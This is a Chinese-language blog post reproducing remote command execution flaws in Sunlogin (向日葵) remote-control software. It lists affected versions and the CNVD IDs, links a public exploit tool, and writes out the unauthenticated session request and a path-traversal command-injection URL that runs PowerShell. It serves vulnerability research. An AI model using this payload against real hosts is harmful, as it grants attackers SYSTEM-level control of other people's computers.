向日葵 | 远程代码命令执行漏洞

向日葵介绍

​ 向日葵远程控制是一款面向企业和专业人员的远程pc管理和控制的服务软件。可以在任何有网络的情况下,轻松访问并控制安装了向日葵客户端的远程主机。同时还能实现远程文件传输、远程视频监控等功能,这不仅为用户的使用带来很多便捷,还能为其提供各类保障。

​ 据说是向日葵运行后开启了一个4w以上的端口。

漏洞编号

https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
上海贝锐信息科技股份有限公司向日葵个人版for Windows存在命令执行漏洞
https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
向日葵简约版存在命令执行漏洞

影响范围

向日葵个人版for Windows <= 11.0.0.33

向日葵简约版 <= 1.0.1.43315

工具复现

向日葵版本:10.3.0.27372

操作系统:Windows10

工具:https://github.com/Mr-xn/sunlogin_rce/releases/tag/new

1、利用xrkRce快速扫描问题进程端口:49413

向日葵 | 远程代码命令执行漏洞_第1张图片

2、命令执行,我们直接获取syetem权限

向日葵 | 远程代码命令执行漏洞_第2张图片

手工复现

1、扫描开放端口,并验证可获取向日葵session的端口

浏览器访问(在接口/cgi-bin/rpc的Handler处理函数中可以进行未授权认证):ip+端口号+cgi-bin/rpc?action=verify-haras(获取session值CID)

向日葵 | 远程代码命令执行漏洞_第3张图片

2、ping命令拼接直接导致命令执行

/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+whoami

向日葵 | 远程代码命令执行漏洞_第4张图片

你可能感兴趣的:(#,漏洞复现,web安全,漏洞复现,向日葵,命令执行)